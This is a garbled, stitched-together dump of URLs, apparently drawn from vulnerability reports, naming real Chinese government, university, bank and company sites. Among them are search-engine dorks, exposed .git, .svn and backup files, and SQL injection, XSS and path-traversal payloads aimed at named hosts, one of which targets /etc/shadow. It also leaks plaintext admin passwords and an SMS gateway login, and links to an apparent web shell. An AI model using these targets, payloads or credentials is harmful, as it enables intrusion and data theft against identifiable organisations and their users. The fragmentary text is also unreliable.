http://218.56.40.229:8045/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://uowechat.wandoujia.com/.git/config http://uowechat.wandoujia.com/.git http://uowechat.wandoujia.com/.git http://zljs.lishui.gov.cn/publish/index.php?NodeID=215 inurl:slview.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://xmjmedu.com:8085/jmpwbm http://xmjmedu.com:8085/jmpwbm/data/ http://xmjmedu.com:8085/jmpwbm/dbbak/ inurl:plview.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://gift.lefen.cn http://**.**.**/_ http://**.**.**/ http://**.**.**/ inurl:caiwgkview.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://www.gtggjy.com/TSPB/gtweb/public/ShowInfo.jsp?pubGuid=F74599BB524992915BCBBD2285374B07&type=6 http://www.jszbw.com/TSPB/web/zbgg/Content.jsp?pubGuid=E8E6DFC4BE15C6BF577040017255BCF1&itemType=1&pubType=0 http://www.smztb.com.cn/TSPB/web/pubinfo/pubInfoContent.jsp?pubGuid=56BD48A58BF595380768D96BB987FC17&itemType=&pubType=0 http://221.13.64.100:8080/speedlist.action http://car.51yund.com http://cms.51yund.com/sport/ http://car.51yund.com/phpmyadmin/index.php https://www.twbbs.tw www.oppodigital.com.cn http://service.jiuyang.com.cn/js/ajaxGetStationByCityJson.do?cityid=81C017FCBC79D04DE040007F01007E11&stationname=%25E6%2598%25A0%25E5%25B1%25B1&from=0&to=5 http://api.joyoung.com:8089/ia/appapi/loadimg?fileid=7b5fb6f0cbb54f93b4ebea766261e2bc http://www.pa18tianqin.com/ http://58.56.83.222/ecweb http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://malaysia.soufun.com.tw/js.asp?n=1&j=13&tid=1 http://wcmc.csu.edu.cn:8080/zlpg/bbsDeal!getExcExperienceBBSContent.action http://wcmc.csu.edu.cn:8080/zlpg/justshe.jsp http://www.mrchuang.com/index/showarticledetail/id/201328934.html去掉.html加个 http://www.mrchuang.com/index/showarticledetail/?id=201328934 www.mrchuang.com/dbadmin/ http://www.haagri.gov.cn/xxgk/xxgkinfo.action?typeid=1 http://www.haagri.gov.cn/html/search/articleSearch.action http://wljy.sjy.net.cn/albumCommentsAction!insert.action http://www.nmjyw.cn/albumCommentsAction!insert.action http://search.zikao.eol.cn/admin/exam_page.php?exam_id=36 http://www.ahmzyf.com/ http://60.173.150.158:8090/upload/TZ/ http://www.ctspc.fcu.edu.tw/ http://www.ctspc.fcu.edu.tw/manage/login.php http://www.ctspc.fcu.edu.tw/manage/admin.php http://123.233.241.233/ http://123.233.241.233/html/index.html http://0978595101.soufun.com.tw/NewsDetail.aspx?newsid= http://0978595101.soufun.com.tw/GoodsDetail.aspx?Goodsid= http://61.155.173.182:610/admin.php http://api.dianping.com/ http://23825228.soufun.com.tw/news.aspx?newsid=2025 http://ask.sdo.com/userinfo/myreview?gameno=45 http://www.mao10.com/ http://www.mao10.com/article-66.html http://fan.wandoulabs.com/log http://fan.wandoulabs.com/api/rank http://fan.wandoulabs.com/api/data/%E8%B5%9B%E7%99%BE%E5%91%B3%28%E8%A5%BF%E5%B0%8F%E5%8F%A3%29 http://uowechat.wandoujia.com/.git/config http://fan.wandoulabs.com/.git http://fan.wandoulabs.com/.git http://mail.bjsasc.com/user/aa.txt http://www.swdpb.gov.cn/ShowClass_wsbs.asp?ClassID=3 http://www.swdpb.gov.cn/admin_login.asp http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2&p=&c=&page=1 http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2 http://dlhaier.com/ http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://58.221.14.206:8035/luPaiZuAction.action http://eshop.picchealth.com/claim/reportCase.jsp.bak http://eshop.picchealth.com/complain/customerComplain.jsp.bak http://eshop.picchealth.com/contQuery/password/resetPassword/index.jsp.bak http://eshop.picchealth.com/contQuery/personal/index.jsp.bak http://eshop.picchealth.com/index.jsp.bak http://eshop.picchealth.com/newSales/index.jsp.bak http://eshop.picchealth.com/sales/payForm.jsp.bak http://eshop.picchealth.com/contQuery/password/login/checkLogin.jsp.bak http://eshop.picchealth.com/contQuery/password/login/checkLogin.jsp.bak中,有一段代码是这么写的, www.zhaopin.com http://bdwsw.zhanchenggame.com/index.php?c=general&m=get_general_by&type=3%27 http://map.sogou.com/store/nanchong+n=%3Cimg%20src=%22%22%3E%3C/img%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript http://www.taonan.gov.cn/more.jsp?catalogId=1710000000 http://www.rc.com.cn/news/business.asp?id=%28length%28CTXSYS.DRITHSX.SN%28user%2c%28select+chr%2895%29||chr%2833%29||chr%2864%29||chr%2851%29||chr%28100%29||chr%28105%29||chr%28108%29||chr%28101%29||chr%28109%29||chr%28109%29||chr%2897%29+from+DUAL%29%29%29%29 http://www.rc.com.cn/company/ http://www.hikvisioneurope.net/bak.jsp http://wooyun.org/bugs/wooyun-2015-093653 site:shangliu.haier.com http://bbs.qingcheng.com/data/cache/index.php aspnet:MaxHttpCollectionKeys aspnet:MaxJsonDeserializerMembers aspnet:MaxHttpCollectionKeys aspnet:MaxJsonDeserializerMembers http://www.xian.12306.cn/Dzsw/Shky/hwky.wai/ http://www.xian.12306.cn/Dzsw/index.jsp后,系统账号密码即默认填写,登陆即可 http://basic.10jqka.com.cn/admin/index.php?op=csiReport&act=view http://my.55bbs.com/user_index.php?ac=dialog&dialogid=52806017&relateuid=4192990&pmid=52806018&folder=inbox&inboxpage=1 http://localhost/qibo/bk/blog/member/postlog.php?job=postlog http://www.ihaier.com/channel?order=1 http://www.ihaier.com/partners/?order=1 http://www.qagt.gov.cn/admin_999/web_manage@qkhot.asp http://XX.com/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00 http://wooyun.org/bugs/wooyun-2014-088313 http://www.zsglj.com/ http://home.ciwong.com/ http://113.108.109.39:8089/EasyXI/SRM/VendorPortal/Default.aspx http://www.zyrs.gov.cn/sites/templateLib/cache/20140701/zhiCJSJKS.jsp?PID=2c9e81e44b31e763014b4365f030001f http://www.zyrs.gov.cn/admin/login.htm http://daoyou-chaxun.cnta.gov.cn/ http://www.maxthon.cn/ http://mgtest.ipaychat.com/loginAction!login.action http://mgtest.ipaychat.com/error.jsp try.daqi.com/cgi-bin/experience/report_show?id_article=16 http://www.cxaic.gov.cn/xgwj/xgwj_show.asp?id=2 http://store.boe.com/store/index.html http://114.113.144.146/usermgrLogin!getLogin.action http://59.108.97.197:28017 http://59.108.97.197:8080 www.chinesegamer.net http://banner2.chinesegamer.net/gamebn/abm.aspx?z=63 https://github.com/wangxiaoqi/ttxlbs/blob/083a8d3bd3ac23cfe892f819f7443f332f7130bf/%E5%9F%9F%E5%90%8D%E4%B8%8E%E7%A9%BA%E9%97%B4.txt http://www.xinnet.com/index.html inurl:WoodsManage.aspx http://221.2.171.59:8300/ExtWebModels/LandManage/WoodsManage.aspx http://60.2.214.118:8088/ExtWebModels/LandManage/WoodsManage.aspx http://121.17.2.52/ExtWebModels/LandManage/WoodsManage.aspx http://rctdlz.cn/ExtWebModels/LandManage/WoodsManage.aspx http://221.1.104.11:8011/ExtWebModels/LandManage/WoodsManage.aspx http://demo.inongyou.cn/ExtWebModels/LandManage/WoodsManage.aspx http://221.2.171.59:8000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.127.190:7000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://gz.focus.cn//group/vote.php?group_id=1641&m=0&v_poll_id=687 inurl:showlandlist.aspx?InfoType= http://60.2.214.118:8088/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://121.17.2.52/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://rctdlz.cn/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://221.1.104.11:8011/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://61.186.154.210:8088/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://demo.inongyou.cn/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://221.2.171.59:8300/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 inurl:Town.aspx?class= http://60.2.214.118:8088/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://121.17.2.52/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://rctdlz.cn/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://221.1.104.11:8011/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://61.186.154.210:8088/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://demo.inongyou.cn/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://221.2.171.59:8300/ExtWebModels/WebFront/town/Town.aspx?class=000001 inurl:ShowBusinessList.aspx?ctype= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://guangai.dayoo.com/jzShow/gacs/list/id/3 http://guangai.dayoo.com/front/login3.html http://www.rzdgyy.com/news_list.php?type_id=2 http://www.rzdgyy.com/news_list.php?type_id=2 http://www.rzdgyy.com/appo_login.php http://www.rzdgyy.com/staff_login.php http://www.rzdgyy.com/super_login.php http://www.rzdgyy.com/bbs http://gzycdtb.dayoo.com/baoming/baoli.php http://t.eastmoney.com/login.aspx http://9night.kimiss.com http://admin.heitao.com https://passport.lenovo.com/wauthen/login http://58.56.128.21/sendmessage/ https://github.com/KaiyiZhang/Secipt/blob/master/LFI.TESTER.py http://xsc.gzhu.edu.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.zhuqu.com/tuce/314811.html http://www.zhuqu.com/tuce/314806.html http://www.huimaiche.com/Login?re=http%253a%252f%252fi.huimaiche.com%253a80%252fUser%252fUserInfo.aspx http://demo.kesion.com/user/weibo.asp http://t.10jqka.com.cn/ http://**.**.**/homePage.do_ http://**.**.**/loginaction!userAuthority.action_ http://**.**.**/login.action http://www.53kf.com/log.txt http://master.53kf.com/info.php http://www.rzeic.gov.cn/tzjg/denglu.php http://www.rzeic.gov.cn/dzxx/denglu.php http://www.rzeic.gov.cn/jscx/ http://www.rzeic.gov.cn/wlsj/denglu.php http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs存在注入点 http://www.whudx.com/admin/main.aspx http://222.73.242.38/cpcUsers/login http://zlgc.edugd.cn/proapply/login.do http://www.yczjw.cn/wtjob.asp?id=21 http://job0514.com/wtjob.asp?id=21 http://www.dtrsrc.com/wtjob.asp?id=21 http://www.tfjyfw.com/wtjob.asp?id=229 http://www.mmhu.cn/wtjob.asp?id=30 http://112.124.28.12/wtjob.asp?id=21 http://www.mdjmg.com/wtjob.asp?id=21 http://www.dykr.com/wtjob.asp?id=3090 http://www.yczjw.cn/admin/login.asp http://job0514.com/admin/login.asp http://www.dtrsrc.com/admin/login.asp http://www.tfjyfw.com/admin/login.asp http://www.mmhu.cn/admin/login.asp http://www.dykr.com/wtjob.asp?id=3090 http://www.fruitday.com http://www.crmstjc.com.cn/ http://www.crmstjc.com.cn/news_Show_user.asp?ID=868 http://oa.wzfc.zjol.com.cn/ http://feedback.doshow.com.cn/feedback/addFeedback.action http://jwcad.ahut.edu.cn/article/ArticleShow.asp?ArticleID=1066 http://chajian.baidu.com/app-res.html http://wx.cqcb.com/index.php?g=Wap&m=Vote&a=index&token=****&wecha_id=****‘&id=21 http://dealer.xcar.com.cn/dealer/dealer_ajax_search.php?ac=show_dealer&bid=210&province_id=1&city_id=475 http://dealer.xcar.com.cn/dealer/dealer_ajax_search.php?ac=show_dealer&bid=210&province_id=1&city_id=475 www.361sport.com/index.php?m=info&a=show&id=8存在注入 http://222.76.242.141:8888/ http://222.76.242.141:8888/queryGrzhxxJson.shtml?custAcct=10030010078&startDate=20140204&endDate=20150204 http://www.186online.com/usermanager/gd165login.do?userName=admin&passWord=admin&Submit232=%26%23160%3B%B5%C7%C2%BC%26%23160%3B password:wEAver2012 name:ecology7 http://club.dzwww.com/forum.php?mod=viewthread&tid=46273305&page=4#pid80541501 http://box.zhangmen.baidu.com/box-jump.html?u=javascript:alert%28document.domain%29 http://zpsurveyadmin.zhaopin.com/admin/admin.php?action=logout http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1 http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no http://oa.wzfc.zjol.com.cn/bbs/ http://219.143.118.112:8080/YJZHCL/user_manage.jsp http://www.sharp.cn/ http://www.gzsums.net/default.aspx中山大学附属第一医院在国家卫生计生委某系统的账户存在弱口令,导致全院医生信息泄漏风险。包括姓名、身份证、详细住址、邮箱、执业证、资格证、籍贯、联系方式等等。 http://dqkh.cmda.org.cn/ http://218.94.36.88/index.php http://www.xaglkp.com/ http://www.xaglkp.com/TicketOrder/printTicket?bookno=693335&start=1002 http://www.xaglkp.com/TicketOrder/printTicket?bookno=693342&start=1002 https://oa.minshengec.cn/seeyon/index.jsp http://www.life.uestc.edu.cn/高校外包网站漏洞不忍直视,成都新西软 http://bang.liba.com/site/198 https://mail.homelink.com.cn/ http://yi-version.qiniudn.com/@/familymonitor/1.8.5.1C_201514062136home http://yi-version.qiniudn.com/@/familymonitor/1.8.5.1B_201513211614home http://yi-version.qiniudn.com/@/familymonitor/ http://182.242.231.170:803/mailbox/showemail.asp http://219.216.19.233:8081/mailbox/showemail.asp http://www.qzygz.com:8081/mailbox/showemail.asp http://210.45.98.55/mailbox/showemail.asp http://220.165.85.220:8000/mailbox/showemail.asp http://vip.library.neusoft.edu.cn/mailbox/showemail.asp http://124.93.245.83/mailbox/showemail.asp http://library.fjrtvu.edu.cn:1080/mailbox/showemail.asp http://mall.moji.com/ http://kms.h3c.com/kms/kms/dir/list_article_4_h3c_cn?kmtype=9 http://kms.h3c.com/kms/kms/dir/list_article_4_h3c_cn?kmtype=9 http://unadmin.ucweb.com http://www.tdm.com.mo http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.hisensephone.com/search.aspx?q= http://123.125.22.73/ http://123.125.22.73/jj/jj.zip http://123.125.22.73/viprs/conf/conf.conf http://123.125.22.73/viprs/init.py http://www.xzsdyyy.com/xzsdyyy.rar http://www.xaglkp.com/ http://www.xaglkp.com/Account/Getpwd http://www.xaglkp.com/Account/GetpwdAction2 http://www.xaglkp.com/TicketOrder/UserInfo http://www.xaglkp.com/TicketOrder/UserInfoUpdate?abc=save http://218.65.112.148:81/ http://www.bjprd.com.cn:88/PreciousE/admin/Booking_JFLY.asp?FClass=1 http://210.30.190.86/PreciousE/admin/Booking_Apply.asp?FClass=0304 http://zcgl.usc.edu.cn/gzyq/admin/Booking_Apply.asp?FClass=07 http://202.193.80.53/pe/admin/Booking_JFLY.asp?FClass=X http://sbgx.nefu.edu.cn/peweb/admin/Booking_JFLY.asp?FClass=5 http://60.28.194.208:8881/sendsms.php?user=webmonitor&passwd=d3gq39rko&mobile=xxx&content=xxxxx http://60.28.194.208:8881/ http://campus.chinahr.com/2015/pages/citicscampus2015/ http://www.ccb.com/cn/html1/office/ebank/dzb/subject/12/docs/security/CCB_E_Setup_Total_20140819_x64.exe http://www.cebbank.com/site/resource/cms/2015/01/2015012616221316533.zip https://dlsev.boc.cn/support/seccwidgets/SecEdit.BOC.exe https://e.bank.ecitic.com/perbank5/download/helpmate/HelpmateSetup.exe http://blogs.technet.com/b/fdcc/archive/2011/11/03/enabling-initialize-and-script-activex-controls-not-marked-as-safe-in-any-zone-can-get-you-hurt-bad.aspx http://www.icbc-ltd.com/icbcltd/%e5%85%b3%e4%ba%8e%e6%88%91%e8%a1%8c/%e5%b7%a5%e8%a1%8c%e6%96%b0%e9%97%bb/%e4%b8%ad%e5%9b%bd%e5%b7%a5%e5%95%86%e9%93%b6%e8%a1%8c%e5%85%ac%e5%b8%832013%e5%b9%b4%e5%ba%a6%e7%bb%8f%e8%90%a5%e6%83%85%e5%86%b5.htm http://open.youku.com/admin_db_backup.aspx?action=BackupData http://www.sknow.com.cn/ http://www.runhome.com.cn/catnews.php?catid=17 http://www.fujin.gov.cn:8080/wcm/web_sosuo/ http://app.finance.ifeng.com/hq/trade/draw_zijin.php?type=z&cate=ind http://democn.shop-builder.cn/?m=product&s=detail&id=465 http://democn.shop-builder.cn http://mse.se.sjtu.edu.cn/Login.aspx http://mse.se.sjtu.edu.cn http://60.216.5.39/login.do?method=init http://localhost/phpok/admin.php?c=tpl&f=delfile&id=1&folder=./../../data/&title=install.lock http://localhost/phpyun/data/backup/PHPYUN~1.SQL http://tw.53kf.com/setting/site_edit.php?arg=pwoycjkyf247031 http://topic.xcar.com.cn/201107/jlys/list.php?iscar=0&count=2259&per=8&cur=7 http://app.finance.ifeng.com/money/insurance_cc_detail.php?qtype=id&query=534 http://xuancheng.gov.cn http://tieba.jxedt.com/wap/t.asp?/=12&T=1 http://silicongroup.zju.edu.cn/973/news_detail.asp?id=17 http://silicongroup.zju.edu.cn/973/news_detail.asp?id=17 http://silicongroup.zju.edu.cn/973/login.asp http://silicongroup.zju.edu.cn/login.asp http://www.airfex.net/cn_asp/prosvr http://www.airfex.net/cn_asp/twzs.asp?id=354 http://111.160.90.67:8181/tologin.action http://sec.lenovo.com/Home/PopUpIndex/#/Login/Login?rd=%2f http://www.km-jsw.com/index!search.xhtml www.womai.com)注册的用户,在club社区的登录密码是统一的密码,包括某些版主,超级版主等。 cn:8080/gklqjgcx/gklqcxjg.asp http://122.0.71.86:810/Sys/index.aspx http://www.gxjnjc.gov.cn/auditor/admin/login.action http://enpower.bdchina.com:8001/jxt/news/bulletinTemplate.jsp?id=1992 http://enpower.bdchina.com:8001/jxt/news/newsTemplate.jsp?id=2117 http://oa.mingdao.edu.tw/md/200310/honor/show.php?News_ID=1339 http://wooyun.org/bugs/wooyun-2015-096319 http://www.ncu.edu.tw/~ncu7020/rdnewsletter/resultshare.php?action=show&cid=34&id=15 admin:password http://wooyun.org/bugs/wooyun-2010-085006 http://113.108.148.4:8090/ http://www.lbsfj.gov.cn/jsp/cmsNews/cmsNewsView.action http://27.223.70.11/index_admin.asp http://manage.21its.com/Management http://manage.21its.com/Management/Hr/HRUserWorksMain.aspx http://shop.tongzhuo100.com http://xxwj.dg.gov.cn/door/daj/index_index.action http://m.feedback.oppo.com http://www.chinakjzx.com/column.do?ID=41 http://www.chinakjcxdb.com/column.do?ID=138 http://www.zgwscy.com/column.do?ID=60 http://115.47.21.161:8080/column.do?ID=64 http://www.chinazwyl.com/ http://www.zgwscy.com/column.do?ID=60 http://www.chinakjcxdb.com/column.do?ID=138 http://app.zjepb.gov.cn:8089/nbjcsj/LoginAction_login http://lhshbj.gov.cn/adm/index.php http://www.cofcoyoucai.com/ http://www.qhsdsh.com/infor.php?id= cn:995 cn:993 cn:143 cn:110 cn:995 http://club.bydauto.com.cn/uc_server/avatar.php?uid=107733 http://218.25.76.133/a/ma.jsp?action=command http://www.kugou.com/fm2/app/musicshow/admin/njadmin/index.php http://www2.kugou.com/fm2/app/musicshow2/nj/index/njid=xxx http://edu.cma.gov.cn/forum.php http://118.144.75.11:106/ http://campus.xunlei.com/p/test_list.html?city=12#&cityname=%E8%A5%BF%E5%AE%89 http://yzd.chinasafety.gov.cn/ReportQuery/qyInfo/qyInfoDetail.aspx?qy_ID=32297 https://vpn.nari-relays.com/ http://168.160.250.22/Login.action http://www.jxjtj.gov.cn/ewebeditor/admin/default.aspx http://118.244.201.7:8080/award/award3.php?id=3 http://118.244.201.7:8080/database.zip http://118.244.201.7:8080/data.zip http://118.244.201.7:8080/www.zip http://118.244.201.7:8080/backup.zip http://118.244.201.7:8080/123456.rar http://118.244.201.7:8080/12345.rar http://118.244.201.7:8080/333.rar http://182.242.231.170:803/sujuku/login_sjk.asp http://219.216.19.233:8081/sujuku/login_sjk.asp http://www.qzygz.com:8081/sujuku/login_sjk.asp http://210.45.98.55/sujuku/login_sjk.asp http://220.165.85.220:8000/sujuku/login_sjk.asp http://vip.library.neusoft.edu.cn/sujuku/login_sjk.asp http://210.44.80.46/sujuku/login_sjk.asp http://library.fjrtvu.edu.cn:1080/sujuku/login_sjk.asp http://www.handu.com/user.php?act=qpassword_name http://bianlun.7k7k.com/comment_pk.htm?pkid=52 ftp://121.207.254.152/ http://nderp.99.com/Main_Default.aspx http://deviceadmin.sj.91.com/login.aspx?stat=0 http://ndea.99.com/Default.aspx http://www.jjsgsl.gov.cn/index.php?_m=mod_article&_a=fullist&caa_id=22 http://baoxian.axatp.com/showSmallHomeMoneySalesPreview.do?linkResource=&orderID=&ecInsureId=74505815021006034994&isSee= http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp http://www.dlwsxx.com/ws2004/Model/login1.asp http://www.cqoppo.com/Login.aspx http://www.cqoppo.com/fckeditor//editor/dialog/fck_about.html http://www.cqoppo.com//upload/Image/1.aspx https://msdn.microsoft.com/en-us/library/ms682425.aspx http://112.64.185.162/ http://112.64.185.162/user/ http://login.zjdpf.org.cn:9000/report/login.action http://paoxue.com/home.php?mod=space&uid=1&do=profile http://paoxue.com/space-uid-1.html http://www.chinalaw.gov.cn/ http://admin.yoloho.com/newdayima/soft_feedback http://admin.yoloho.com/index https://github.com/lili6/tessar-server/blob/0f76d068af65a783d16d5124e576c323d292825c/tessar/src/main/java/com/cyou/scheduler/crashscheduler/db/mongodb/SendEMailMongoDBPage.java http://www.e-chinalife.com/cardmisfile/uploadFiles/download.jsp?type=1&PDFnameArr=../../../index.jsp&Onputname=1.jsp http://www.e-chinalife.com/selfcard/mis/manager/login/frmLogin.jsp http://211.100.41.254/.svn/entries http://211.100.41.200/.svn/entries http://211.100.41.149/.svn/entries 